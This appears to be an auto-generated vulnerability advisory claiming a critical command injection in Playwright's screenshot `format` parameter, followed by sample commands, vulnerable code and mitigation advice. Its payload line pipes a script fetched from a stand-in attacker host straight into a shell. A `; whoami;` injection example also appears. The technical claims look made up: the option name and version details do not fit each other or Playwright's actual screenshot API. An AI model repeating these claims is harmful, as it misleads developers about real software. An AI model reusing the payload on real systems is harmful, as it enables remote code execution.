The vulnerability in Playwright’s screenshot function stems from improper neutralization of special elements used in an OS command. The `format` parameter, which normally accepts values such as `jpeg` or `png`, is interpolated directly into a shell command string. When an attacker supplies a malicious value such as `; whoami;`, the library neither sanitizes nor escapes it. The unsanitized value is concatenated into the command, which is then executed via the system shell. The shell treats the semicolons as command separators, so the attacker’s payload runs with the privileges of the Node.js process, leading to a complete compromise of the server.
Platform: Node.js
Version: <1.15.2
Vulnerability: Command Injection
Severity: Critical
Date: 2024-05-15
Predicted patch date: 2024-05-22
What Undercode Say:
```shell
# Identify whether a system uses a vulnerable version of Playwright
npm list playwright

# Simulate the vulnerable command construction
echo "screenshot --format='\$MALICIOUS_INPUT'"

# Example of a malicious payload
MALICIOUS_INPUT="'; curl http://attacker.com/exfiltrate.sh | sh; "
```
```javascript
// Example vulnerable code snippet
const { chromium } = require('playwright');

// userInput is attacker-controlled, e.g. copied verbatim from a request body;
// here it is read from the command line so the snippet runs on its own.
const userInput = process.argv[2];

(async () => {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.goto('http://example.com');
  // The unvalidated value reaches the screenshot `format` option unchanged.
  await page.screenshot({ path: 'example.png', format: userInput });
  await browser.close();
})();
```
How to Exploit:
Craft HTTP POST request with `format` parameter containing shell metacharacters and commands for remote code execution.
Protection from this CVE:
Upgrade to v1.15.2. Sanitize user input and enforce a strict allowlist for the `format` parameter (only the values the API actually supports, such as `png` and `jpeg`); reject everything else before it reaches any command construction.
Impact:
Remote Code Execution, Full System Compromise, Data Breach.
Sources:
Reported By: github.com